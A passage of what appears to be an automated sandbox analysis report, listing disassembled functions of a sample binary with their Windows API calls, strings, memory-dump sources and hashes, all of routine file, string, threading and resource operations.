    • Opcode Fuzzy Hash: 54d9cb7fe2386e5f4ee96056c803277215fc32aa7bb6ae976b59b126efa8f150
    • Instruction Fuzzy Hash: B8F0B2B1D11219ABDB009F99D988ADEFBB8FB08354F50802AE605B6240D7B55A048FA4
    Function 00CBABCA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: __alldvrm$_strrchr
    • String ID:
    • API String ID: 1036877536-0
    • Opcode ID: 838d351d10c979b051735ecdd2ea4a95940ff434e8fe6276b15dd9b2de709c18
    • Instruction ID: 43e51a00963827619eb60735f8cc12d5bffe51ab2e071e1bda9c801b2b44ea46
    • Opcode Fuzzy Hash: 838d351d10c979b051735ecdd2ea4a95940ff434e8fe6276b15dd9b2de709c18
    • Instruction Fuzzy Hash: 14A13472A007869FEB26CF28C8917EEBBE4EF55310F18416DE5E59B281D638CE41C752
    Function 00C9B74D Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
    Download Yara Rule
    APIs
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00C98D5C,?,?,?), ref: 00C9B7F3
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00C98D5C,?,?), ref: 00C9B837
    • SetFileTime.KERNEL32(?,00C98AEC,?,00000000,?,00000800,?,00C98D5C,?,?,?,?,?,?,?,?), ref: 00C9B8B8
    • CloseHandle.KERNEL32(?,?,00000800,?,00C98D5C,?,?,?,?,?,?,?,?,?,?), ref: 00C9B8BF
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$Create$CloseHandleTime
    • String ID:
    • API String ID: 2287278272-0
    • Opcode ID: 8079a1e38f68fde8984793e51af1fcd236a0e1a4c4f8fa12789b8aa93e18b8bf
    • Instruction ID: b50824fc6d86816e0a9ea604817904a83815d91c3ddc132f02a3424cb7f7e6c0
    • Opcode Fuzzy Hash: 8079a1e38f68fde8984793e51af1fcd236a0e1a4c4f8fa12789b8aa93e18b8bf
    • Instruction Fuzzy Hash: E541D030188381AAEB21DE64ED59F9EBBE8ABC5700F04091DF5E1D71C0D764DE08DB62
    Function 00C910E0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen
    • String ID:
    • API String ID: 176396367-0
    • Opcode ID: c454c9c9fff3a02e5b40f5747e31be68b2326e2a2538be577ed9c315d38bad32
    • Instruction ID: 23d7c81f4541154a14eded19e0ca957abb98f39929dcf5e3ea1da0e8e356ae7e
    • Opcode Fuzzy Hash: c454c9c9fff3a02e5b40f5747e31be68b2326e2a2538be577ed9c315d38bad32
    • Instruction Fuzzy Hash: 82419471A00A665BCB159FB88C59AEE7BB8EF05311F040029FE45F7245DB30AE498AE1
    Function 00C9851F Relevance: 6.1, APIs: 4, Instructions: 118COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 00C98532
    • _wcslen.LIBCMT ref: 00C98558
    • _wcslen.LIBCMT ref: 00C985EF
    • _wcslen.LIBCMT ref: 00C98657
      • Part of subcall function 00C9B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00C9B991
      • Part of subcall function 00C9B41F: RemoveDirectoryW.KERNEL32(?,?,?,00C98649,?), ref: 00C9B430
      • Part of subcall function 00C9B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00C98649,?), ref: 00C9B45E
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$DirectoryRemove$CloseFind
    • String ID:
    • API String ID: 973666142-0
    • Opcode ID: d9f89dee1c430f339a02c30b63ceb9f389ad4dac8135032bcbeb1b366ed54d6c
    • Instruction ID: 191c7499bc1f77b7e1cedf488cdf0c5c6dca7cd4feb7ba4f0876305a0cd9e77e
    • Opcode Fuzzy Hash: d9f89dee1c430f339a02c30b63ceb9f389ad4dac8135032bcbeb1b366ed54d6c
    • Instruction Fuzzy Hash: 5131EB72800254AADF21AF60CC49BEE3365AF46380F054496F955A714ADF71DF8DDB90
    Function 00CBDB38 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00CBA861,?,00000000,?,00000001,?,?,00000001,00CBA861,?), ref: 00CBDB85
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CBDC0E
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CB80A1,?), ref: 00CBDC20
    • __freea.LIBCMT ref: 00CBDC29
      • Part of subcall function 00CBA7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
    • String ID:
    • API String ID: 2652629310-0
    • Opcode ID: 1340d9a783dd7b76575a9f53aece5f6190691ce728aa07817d79c1a031b9697c
    • Instruction ID: fe526b4ef4e3022f066b3dade46a4fc84b414cec3a25bc5d2ab4c4169ee00079
    • Opcode Fuzzy Hash: 1340d9a783dd7b76575a9f53aece5f6190691ce728aa07817d79c1a031b9697c
    • Instruction Fuzzy Hash: 7131CD72A0020AABDF289F64DC41EEE7BA5EF00320F094528FC16D7190EB35CE90DB90
    Function 00CAB663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
    Download Yara Rule
    APIs
    • GetDC.USER32(00000000), ref: 00CAB666
    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CAB675
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CAB683
    • ReleaseDC.USER32(00000000,00000000), ref: 00CAB691
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CapsDevice$Release
    • String ID:
    • API String ID: 1035833867-0
    • Opcode ID: 4a5d7cd93136d5cd36b60411c6fa931ef93dd6485a1a818440db55a80ae19c50
    • Instruction ID: 5e624b4ff0510d1212575a57be306aea8b30998469327027379a1b73aa7ccc34
    • Opcode Fuzzy Hash: 4a5d7cd93136d5cd36b60411c6fa931ef93dd6485a1a818440db55a80ae19c50
    • Instruction Fuzzy Hash: 2FE0EC31986A60A7D3601B60AC1DBAE3F64AB16712F054006F705961D0CBB05400CFD6
    Function 00CBC368 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 00CBC4D4
      • Part of subcall function 00CB51D6: IsProcessorFeaturePresent.KERNEL32(00000017,00CB51A8,00000050,00CC4ADC,?,00C9EA30,00000004,00CD3070,?,?,00CB51B5,00000000,00000000,00000000,00000000,00000000), ref: 00CB51D8
      • Part of subcall function 00CB51D6: GetCurrentProcess.KERNEL32(C0000417,00CC4ADC,00000050,00CD3070), ref: 00CB51FA
      • Part of subcall function 00CB51D6: TerminateProcess.KERNEL32(00000000), ref: 00CB5201
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
    • String ID: *?$.
    • API String ID: 2667617558-3972193922
    • Opcode ID: 972d5fe56fca4318eb32e817472c9c256f93d190f7b8c306b3a3f3d0056a7248
    • Instruction ID: 5ac636ba2ae27e0d4e83f6baf74a3369fee84ec3771e2e27f654c9b52d1d213f
    • Opcode Fuzzy Hash: 972d5fe56fca4318eb32e817472c9c256f93d190f7b8c306b3a3f3d0056a7248
    • Instruction Fuzzy Hash: 2B516B76E0021AAFDF14DFA8C881AFDBBB5EF58310F24816AE854E7341E6759F019B50
    Function 00C980BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C980C3
      • Part of subcall function 00CA1900: _wcslen.LIBCMT ref: 00CA1906
      • Part of subcall function 00C9B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00C9B991
    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C98262
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B8FA
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B92B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
    • String ID: :
    • API String ID: 3226429890-336475711
    • Opcode ID: 870449fa31c7f779a90d24cbc4788c5b1cd5c25193d909d108f726c9979da9ef
    • Instruction ID: daf260af2375ca3cbe1b9f104dc6ee39b045e3f94a57b25db2d7addfc29b864c
    • Opcode Fuzzy Hash: 870449fa31c7f779a90d24cbc4788c5b1cd5c25193d909d108f726c9979da9ef
    • Instruction Fuzzy Hash: 82515171800568AAEF25EB60CD5AEEE737CEF46300F0440D5B606A7092DB745F89EF61
    Function 00CAC66E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: }
    • API String ID: 176396367-4239843852
    • Opcode ID: b09b2686ae674dc6d1461ecc31962e6275c6a55c268a276db17550baca9c73e1
    • Instruction ID: 81baaefdc054865328c45ba9e8749e240804c97e0053d6e3821a901189acb38b
    • Opcode Fuzzy Hash: b09b2686ae674dc6d1461ecc31962e6275c6a55c268a276db17550baca9c73e1
    • Instruction Fuzzy Hash: 9B21D2325083175AD731EBA4DC85AABB3ECDF86768F10043AF554C3141EB61EE489BA6
    Function 00CA0695 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00CA0620: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CA063F
      • Part of subcall function 00CA0620: GetProcAddress.KERNEL32(00CDA1F0,CryptUnprotectMemory), ref: 00CA064F
    • GetCurrentProcessId.KERNEL32(?,00000200,?,00CA0690), ref: 00CA0723
    Strings
    • CryptUnprotectMemory failed, xrefs: 00CA071B
    • CryptProtectMemory failed, xrefs: 00CA06DA
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressProc$CurrentProcess
    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
    • API String ID: 2190909847-396321323
    • Opcode ID: 54b6b8784b4bc8a4b15c9a60822f36757501cff380b0ee444958919a5b362ea1
    • Instruction ID: 37c9698e731a2ccce98f0496c1d3c7a0590ee18950156866ce711e29527998f1
    • Opcode Fuzzy Hash: 54b6b8784b4bc8a4b15c9a60822f36757501cff380b0ee444958919a5b362ea1
    • Instruction Fuzzy Hash: D511AB32A01622ABDF155F30CC55F6E3B54EF4A7ACF108116FC109B281DB30AE818AD5
    Function 00C9CDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
    Download Yara Rule
    APIs
    • _swprintf.LIBCMT ref: 00C9CDE7
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: __vswprintf_c_l_swprintf
    • String ID: %c:\
    • API String ID: 1543624204-3142399695
    • Opcode ID: 6d769c71b29547846bd8ea5aeacf4a444582cc10a3965f12addddd9b1e4ca42c
    • Instruction ID: ac2884409562ed16f9eeb90c14ee238b97670cc7d1a52b0d0516e9f131695916
    • Opcode Fuzzy Hash: 6d769c71b29547846bd8ea5aeacf4a444582cc10a3965f12addddd9b1e4ca42c
    • Instruction Fuzzy Hash: A10164230043117ADE306B799CCEDABBBECEF853B0B40841AF496C7082EA34D900D2B1
    Function 00CA2337 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
    Download Yara Rule
    APIs
    • CreateThread.KERNEL32(00000000,00010000,00CA2470,?,00000000,00000000), ref: 00CA235B
    • SetThreadPriority.KERNEL32(?,00000000), ref: 00CA23A2
      • Part of subcall function 00C976E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C97707
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Thread$CreatePriority__vswprintf_c_l
    • String ID: CreateThread failed
    • API String ID: 2655393344-3849766595
    • Opcode ID: 71619bd3f2e4fdfc985580cb675a691286b12c481a18ea3ab381c53ea354714e
    • Instruction ID: 479f0f9c1cf0d7469b958f7d101f2ef6c169f5190ea88b2fc3491ff8f6860af0
    • Opcode Fuzzy Hash: 71619bd3f2e4fdfc985580cb675a691286b12c481a18ea3ab381c53ea354714e
    • Instruction Fuzzy Hash: 480126B22463076FDB246F68DC85F667398EF42716F10023EF792521D0CAA1A8808725
    Function 00CA22FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
    Download Yara Rule
    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,00CA2516,?), ref: 00CA2302
    • GetLastError.KERNEL32(?), ref: 00CA230E
      • Part of subcall function 00C976E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C97707
    Strings
    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CA2317
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
    • String ID: WaitForMultipleObjects error %d, GetLastError %d
    • API String ID: 1091760877-2248577382
    • Opcode ID: 350465ce987fb312e6a1272434363d8efbdd9eade9ffaf43de011946c042e3b0
    • Instruction ID: 07f56c8baff8dbf2be4a9818e32ac0be077adb92f4e7c30acc4f2cbf6631222f
    • Opcode Fuzzy Hash: 350465ce987fb312e6a1272434363d8efbdd9eade9ffaf43de011946c042e3b0
    • Instruction Fuzzy Hash: EBD02B3240943133CD002328AC0DF6E38146F23330F244314F339511F0CA60095142A2
    Function 00C9F5BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
    Download Yara Rule
    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,00C9ED75,?), ref: 00C9F5C3
    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00C9ED75,?), ref: 00C9F5D1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FindHandleModuleResource
    • String ID: RTL
    • API String ID: 3537982541-834975271
    • Opcode ID: 9178491eeb4a1514463244fb1bfa0ed0479a6e619e1e547d66cb54d0d6acb26e
    • Instruction ID: c95d977c1d5e4e8b40393963285bb1692328d3c40b811931d3eb9107b75ee8d8
    • Opcode Fuzzy Hash: 9178491eeb4a1514463244fb1bfa0ed0479a6e619e1e547d66cb54d0d6acb26e
    • Instruction Fuzzy Hash: 7DC0123128435066DA342771AC1DF872E986B00715F06445CF601DA1C0DEE5C84186A0